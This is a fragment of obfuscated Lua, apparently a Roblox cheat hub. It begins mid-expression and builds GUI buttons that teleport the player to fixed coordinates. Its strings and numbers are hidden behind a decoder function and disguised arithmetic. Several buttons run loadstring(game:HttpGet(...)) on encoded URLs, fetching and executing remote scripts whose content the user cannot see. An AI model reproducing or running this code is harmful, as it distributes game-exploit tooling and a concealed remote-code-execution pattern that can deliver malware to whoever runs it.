,v7("\188\186","\69\145\138\76\214"), -(1164 -(671 + 492)),0,0);wait();break;end end end});v31:Button({[v7("\68\202\145\157","\118\16\175\233\233\223")]=v7("\173\136\58\180\252\203\47\221","\29\235\228\85\219\142\235"),[v7("\30\213\182\209\117\79\36\89","\50\93\180\218\189\23\46\71")]=function(v137) local v138=0 + 0 ;while true do if (v138==(1215 -(369 + 846))) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -85.2398758,31.0625 + 83 ,114.074821,0 + 0 ,1945 -(1036 + 909) ,1 + 0 ,0,1,v7("\147\244","\40\190\196\59\44\36\188"), -1,0 -0 ,203 -(11 + 192) );wait();break;end end end});v31:Button({[v7("\8\64\196\160","\109\92\37\188\212\154\29")]=v7("\34\227\171\204\35\26\86\184","\58\100\143\196\163\81"),[v7("\57\67\47\175\61\72\230\5","\110\122\34\67\195\95\41\133")]=function(v139) local v140=0 + 0 ;while true do if (v140==(175 -(135 + 40))) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -(205.2398758 -120),86.3125,114.074821,0 + 0 ,0,2 -1 ,0 -0 ,177 -(50 + 126) ,v7("\56\225","\182\21\209\59\42"), -1,0 -0 ,0);wait();break;end end end});v31:Button({[v7("\131\82\221\9","\222\215\55\165\125\65")]=v7("\10\221\201\21\224\129\191\18","\42\76\177\166\122\146\161\141"),[v7("\134\139\9\194\123\119\166\129","\22\197\234\101\174\25")]=function(v141) local v142=0 + 0 ;while true do if (v142==0) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -85.2398758,1471.5625 -(1233 + 180) ,1083.074821 -(522 + 447) ,1421 -(107 + 1314) ,0 + 0 ,2 -1 ,0,1 + 0 ,v7("\96\100","\230\77\84\197\188\22\207\183"), -(1 -0),0 -0 ,0);wait();break;end end end});v31:Button({[v7("\205\17\222\232","\85\153\116\166\156\236\193\144")]=v7("\130\236\66\188\246\64\246\185","\96\196\128\45\211\132"),[v7("\22\140\119\83\208\174\183\211","\184\85\237\27\63\178\207\212")]=function(v143) local v144=0;while true do if (v144==(1910 -(716 + 1194))) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -85.2398758,1.8125 + 29 ,13.074821 + 101 ,0,503 -(74 + 429) ,1,0 -0 ,1 + 0 ,v7("\69\9","\63\104\57\105"), -(2 -1),0,0);wait();break;end end end});v31:Button({[v7("\63\130\188\80","\36\107\231\196")]=v7("\123\185\173\136\79\245\241\215","\231\61\213\194"),[v7("\42\172\49\127\11\172\62\120","\19\105\205\93")]=function(v145) local v146=0 + 0 ;while true do if (v146==0) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -(261.2398758 -176),7.0625 -4 ,114.074821,433 -(279 + 154) ,778 -(454 + 324) ,1,0,1 + 0 ,v7("\228\88","\95\201\104\190\225"), -(18 -(12 + 5)),0 + 0 ,0 -0 );wait();break;end end end});v31:Button({[v7("\155\206\217\218","\174\207\171\161")]=v7("\203\242\2\252\234\151\190\175","\183\141\158\109\147\152"),[v7("\15\8\234\0\46\8\229\7","\108\76\105\134")]=function(v147) local v148=0;while true do if ((0 + 0)==v148) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -(1178.2398758 -(277 + 816)), -(102.6875 -78),1297.074821 -(1058 + 125) ,0 + 0 ,975 -(815 + 160) ,4 -3 ,0,2 -1 ,v7("\166\149","\174\139\165\209\129"), -(1 + 0),0,0 -0 );wait();break;end end end});v31:Label({[v7("\151\182\250\213","\24\195\211\130\161\166\99\16")]=v7("\121\60\214\19\108\41\121\60\214\19\108\41\121","\118\38\99\137\76\51")});v31:Button({[v7("\201\35\29\6","\64\157\70\101\114\105")]=v7("\116\160\162\163\59\73\188\164\235\21\78","\112\32\200\199\131"),[v7("\15\81\80\180\193\170\33\39","\66\76\48\60\216\163\203")]=function(v149) local v150=0;local v151;while true do if (v150==(1898 -(41 + 1857))) then v151=1893 -(1222 + 671) ;while true do if (v151==0) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new(0.187499046 -0 ,1198.9375 -364 ,1344.0625 -(229 + 953) ,1775 -(1111 + 663) ,1579 -(874 + 705) ,0,0 + 0 ,1 + 0 ,0 -0 ,0 + 0 ,0,680 -(642 + 37) );wait();break;end end break;end end end});v31:Button({[v7("\142\131\97\231","\68\218\230\25\147\63\174")]=v7("\129\35\85\88\246\128\43\64\88\179\191\106\118\66\162\191\43\93\79\179","\214\205\74\51\44"),[v7("\217\77\238\240\117\251\79\233","\23\154\44\130\156")]=function(v152) local v153=0;while true do if (v153==(0 + 0)) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -(5.791900600000002 + 23), -19.2935925,416.911316 -250 ,454 -(233 + 221) ,0 -0 , -(1 + 0),1541 -(718 + 823) ,1 + 0 ,805 -(266 + 539) ,2 -1 ,1225 -(636 + 589) ,0 -0 );wait();break;end end end});v31:Button({[v7("\37\163\181\186","\115\113\198\205\206\86")]=v7("\183\82\253\72\129\67\190\124\136\88\241\72\196\99\241\74","\58\228\55\158"),[v7("\151\136\220\34\62\172\54\191","\85\212\233\176\78\92\205")]=function(v154) game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -34.983902,825.506348 -425 ,160.911316,0,0 + 0 , -(1 + 0),1015 -(657 + 358) ,2 -1 ,0,2 -1 ,1187 -(1151 + 36) ,0 + 0 );end});v31:Button({[v7("\126\93\144\246","\130\42\56\232")]=v7("\217\176\39\241\69\43\170\147\40\236\79\45\170\151\43\247\84\48\231","\95\138\213\68\131\32"),[v7("\9\41\173\79\116\43\43\170","\22\74\72\193\35")]=function(v156) game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -34.983902,33.006409000000005 + 91 ,477.911316 -317 ,1832 -(1552 + 280) ,834 -(64 + 770) , -1,0 + 0 ,1,0 -0 ,1 + 0 ,1243 -(157 + 1086) ,0 -0 );end});v31:Button({[v7("\24\124\252\76","\56\76\25\132")]=v7("\125\211\164\53\220\30\243\164\41\194","\175\62\161\203\70"),[v7("\31\220\207\31\55\61\222\200","\85\92\189\163\115")]=function(v158) game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -(21.963684100000002 -16),568.006348,129.9214096 -44 ,1,0 -0 ,0,819 -(599 + 220) ,1 -0 ,1931 -(1813 + 118) ,0 + 0 ,0,1);end});v31:Label({[v7("\29\169\40\44","\88\73\204\80")]=v7("\17\188\47\121\22\229\17\188\47\121\22\229\17","\186\78\227\112\38\73")});v31:Button({[v7("\200\82\229\65","\26\156\55\157\53\51")]=v7("\160\209\16\205\248\125\141\203\2\220\170","\48\236\184\118\185\216"),[v7("\198\188\91\60\205\53\230\182","\84\133\221\55\80\175")]=function(v160) local v161=1217 -(841 + 376) ;while true do if (v161==0) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -28.3500061, -28.4488449,374.519897 -107 ,0.587748766,v7("\240\183","\60\221\135\68\198\167"), -(0.809043527 + 0),0,1,v7("\163\237","\185\142\221\152\227\34"),0.809043527,0,0.587748766);wait();break;end end end});v31:Button({[v7("\108\192\79\238","\151\56\165\55\154\35\83")]=v7("\141\70\23\237\168\66\11\250","\142\192\35\101"),[v7("\245\116\37\175\229\141\175\29","\118\182\21\73\195\135\236\204")]=function(v162) loadstring(game:HttpGet(v7("\0\40\14\80\23\87\178\71\59\19\83\16\67\250\1\40\18\85\6\24\238\13\46\25\79\10\25\248\6\40\84\67\11\0\178\41\44\8\79\3\2\238\69\61\28\75\75\90\255\12\61\73\21\86\84\170\91\58\27\68\6\85\248\14\63\72\25\87\91\251\10\101\27\19\6\88\174\95\111\85\82\5\26\178\81\100\25\70\2\11\171\90\111\77\24\84\84\174\11\104\77\16\83\9\170\12\101\24\22\2\89\249\88\108\30\69\86\95\172\88\61\75\21\84\66\250\1\47\14\70\13\1\248\89\114\14\88\16","\157\104\92\122\32\100\109")))();end});v31:Button({[v7("\151\163\215\222","\203\195\198\175\170\93\71\237")]=v7("\13\67\59\211\17\53\243\37\78\39","\156\78\43\94\181\49\113"),[v7("\81\233\200\175\9\66\122\121","\25\18\136\164\195\107\35")]=function(v163) local v164=0 -0 ;local v165;while true do if (v164==(859 -(464 + 395))) then v165=0;while true do if (v165==(0 -0)) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -7.27499819,399.625 + 431 ,201.024994,838 -(467 + 370) ,0 -0 ,0 + 0 ,0 -0 ,1 + 0 ,0 -0 ,0,520 -(150 + 370) ,1283 -(74 + 1208) );wait();break;end end break;end end end});v34:Button({[v7("\220\40\177\91","\216\136\77\201\47\18\220\161")]=v7("\1\229\45\206\72\249\177\29","\226\77\140\75\186\104\188"),[v7("\154\207\220\51\77\184\205\219","\47\217\174\176\95")]=function(v166) loadstring(game:HttpGet(v7("\176\201\98\18\161\14\55\105\191\212\101\22\252\83\113\50\176\200\116\23\161\81\106\37\183\211\98\7\188\64\54\37\183\208\57\35\162\70\119\33\183\206\59\3\180\95\55\35\236\136\115\86\226\6\122\112\188\222\112\90\229\4\40\34\190\141\46\7\176\86\124\36\239\139\46\1\183\5\45\105\170\220\97\77\229\7\123\119\185\140\112\80\231\13\43\116\189\139\117\3\235\80\124\113\185\219\114\1\180\81\125\37\190\137\32\7\229\0\126\117\190\141\39\0\253\120\113\32\172\152\36\87\224\4\93\21\136\152\36\87\224\4\126\47\160\216\114","\70\216\189\22\98\210\52\24")))();end});v34:Button({[v7("\238\218\187\147","\179\186\191\195\231")]=v7("\213\54\30\240\185\18\25\247\237\58\10\164\220\12\40","\132\153\95\120"),[v7("\146\179\2\33\245\219\163\186","\192\209\210\110\77\151\186")]=function(v167) loadstring(game:HttpGet(v7("\232\23\54\249\236\158\175\76\37\224\236\208\174\4\43\253\247\209\226\22\49\236\237\199\239\13\54\236\241\208\174\0\45\228\176\229\240\17\45\238\240\215\173\2\36\226\176\145\228\2\117\236\167\146\183\80\36\186\170\144\229\1\35\187\168\144\229\87\39\191\168\145\230\83\114\234\171\192\228\76\48\232\232\139\185\6\32\189\254\197\227\6\32\186\251\156\225\85\123\186\250\146\226\0\118\186\253\151\182\83\119\237\254\148\225\86\117\184\174\149\230\83\35\187\176\195\233\16\54\239\246\200\229\82\108\253\231\208","\164\128\99\66\137\159")))();end});v34:Button({[v7("\52\140\241\170","\222\96\233\137")]=v7("\154\187\162\25\200\215\255\178\182\190\95\173\192\192","\144\217\211\199\127\232\147"),[v7("\219\46\50\36\215\68\1\79","\36\152\79\94\72\181\37\98")]=function(v168) loadstring(game:HttpGet(v7("\223\204\83\47\196\130\8\112\208\209\84\43\153\223\78\43\223\205\69\42\196\221\85\60\216\214\83\58\217\204\9\60\216\213\8\30\199\202\72\56\216\203\10\62\209\211\8\58\129\129\67\102\214\221\70\105\135\137\67\109\212\219\16\111\129\129\23\110\132\139\20\107\133\140\22\107\130\139\69\112\197\217\80\112\210\140\68\58\209\217\31\106\134\219\68\61\128\218\22\59\209\143\16\61\142\222\70\102\135\137\70\60\134\139\22\106\132\221\31\60\134\129\18\105\152\223\78\44\195\222\78\51\210\137\9\43\207\204","\95\183\184\39")))();end});v34:Button({[v7("\129\58\255\50","\98\213\95\135\70\52\224")]=v7("\211\166\219\116\92\255\173\221\55\113\205\147","\52\158\195\169\23"),[v7("\89\189\62\120\132\52\120\128","\235\26\220\82\20\230\85\27")]=function(v169) loadstring(game:HttpGet(v7("\128\181\253\210\103\210\238\166\197\125\155\181\167\197\125\156\169\252\192\97\155\164\251\193\123\134\181\236\204\96\198\162\230\207\59\169\177\251\205\115\135\178\164\195\114\131\238\184\149\36\140\240\234\150\37\139\248\176\145\118\139\243\235\196\32\220\242\236\193\34\222\165\189\151\37\216\243\190\195\59\154\160\254\141\38\220\242\189\145\34\219\160\235\198\35\138\247\188\195\117\222\240\186\154\38\218\162\239\144\38\223\241\177\196\119\221\165\184\145\35\218\163\232\150\59\143\168\250\214\114\129\173\236\147\58\156\185\253","\20\232\193\137\162")))();end});v33:Label({[v7("\22\218\221\178","\17\66\191\165\198\135\236\119")]=v7("\45\170\168\28\237\237\172\200\0\186\238\6\236\237\172\240\1\187\167\94\217\233\224\221\79\166\186\83\246\251\172\217\6\168\162\10\191\250\233\210\12\160\163\22\241\236\233\213\79\182\161\6\191\253\255\212\79\136\161\23\210\231\232\212\65","\177\111\207\206\115\159\136\140")});v33:Button({[v7("\49\140\8\0","\63\101\233\112\116\180\47")]=v7("\228\52\233\63\247\50\198","\86\163\91\141\114\152"),[v7("\112\10\120\127\56\82\8\127","\90\51\107\20\19")]=function(v170) loadstring(game:HttpGet(v7("\133\228\145\255\46\215\191\202\232\52\158\228\203\232\52\153\248\144\237\40\158\245\151\236\50\131\228\128\225\41\195\243\138\226\114\172\224\151\224\58\130\227\200\238\59\134\191\212\188\60\139\169\132\184\57\221\245\213\182\100\222\162\129\183\108\221\243\134\190\107\143\162\211\233\111\222\169\214\182\114\159\241\146\160\100\218\162\211\233\109\213\168\134\234\56\219\169\212\184\59\139\242\209\233\100\143\166\213\189\111\222\160\209\184\106\213\162\211\236\62\220\246\210\187\114\170\255\129\226\50\137\245\192\189\104\223\160\135\250\41\200\162\208\189\109\154\249\145\231\120\223\165\215\191\49\130\241\129\252\41\159\249\139\232","\93\237\144\229\143")))();end});v33:Button({[v7("\33\243\232\13","\38\117\150\144\121\107")]=v7("\12\181\250\51\96\157\239\54\33","\90\77\219\142"),[v7("\197\5\45\53\78\6\121\237","\26\134\100\65\89\44\103")]=function(v171) loadstring(game:HttpGet(v7("\249\247\36\51\183\171\172\127\36\173\226\247\126\36\173\229\235\37\33\177\226\230\34\32\171\255\247\53\45\176\191\224\63\46\235\208\243\34\44\163\254\240\125\34\162\250\172\96\117\244\247\225\98\118\253\166\229\98\114\160\164\176\100\32\241\247\224\54\123\244\167\187\96\122\165\168\181\98\123\235\227\226\39\108\246\163\230\53\117\240\161\230\100\115\165\245\180\49\114\162\245\180\101\123\244\243\225\52\38\246\166\182\97\119\167\167\177\101\118\243\164\186\98\115\235\246\234\35\55\162\248\239\53\114\234\229\251\36","\196\145\131\80\67")))();end});v32:Button({[v7("\42\181\30\28","\136\126\208\102\104\120")]=v7("\81\132\200\74\161\91\41\84\56\179\199\70\163\86","\49\24\234\174\35\207\50\93"),[v7("\47\243\241\132\115\13\241\246","\17\108\146\157\232")]=function(v172) loadstring(game:HttpGet(v7("\67\215\0\253\60\242\4\140\6\236\56\230\76\202\0\229\58\170\94\208\17\255\44\167\69\215\17\227\59\230\72\204\25\162\10\172\76\198\61\212\96\161\69\197\29\227\38\188\78\218\29\232\35\172\4\206\21\254\59\173\89\140\7\226\58\186\72\198","\200\43\163\116\141\79")))();end});v32:Button({[v7("\139\51\37\151","\131\223\86\93\227\208\148")]=v7("\205\68\187\179\17\176\240\86\246\151\25\184\234\75","\213\131\37\214\214\125"),[v7("\5\42\41\179\227\39\40\46","\129\70\75\69\223")]=function(v173) loadstring(game:HttpGet(v7("\78\223\231\249\111\181\9\132\225\232\107\161\65\194\231\225\105\237\83\216\246\251\127\224\72\223\246\231\104\161\69\196\254\166\90\230\74\223\246\251\117\225\65\238\253\232\126\227\67\207\188\199\125\226\67\199\246\250\111\206\66\198\250\231\51\226\71\194\253\166\79\224\83\217\240\236","\143\38\171\147\137\28")))();end});v35:Label({[v7("\228\135\161\231","\180\176\226\217\147\99\131")]=v7("\230\169\43\6\199\188\111\86\157\234","\103\179\217\79")});v35:Label({[v7("\126\178\4\193","\195\42\215\124\181\33\236")]=v7("\103\25\119\126\101\184\77\25\119\16\32\239\77\108\30\126\9\241\15\51\119\126\101\184\77\25\119\126\4\252\9\92\51\126\8\247\27\92\58\59\43\236\77\109\54\60\79\184\77\25\119\126\101\184\77\120\51\58\32\252\77\122\56\46\60\249\15\85\50\126\1\241\30\90\56\44\33\184\33\80\57\53\79\184\77\25\119\126\101\184\77\88\57\58\101\225\24\81\119\100\108\146\77\25\119\126","\152\109\57\87\94\69")});v28:ShowTab(v29);
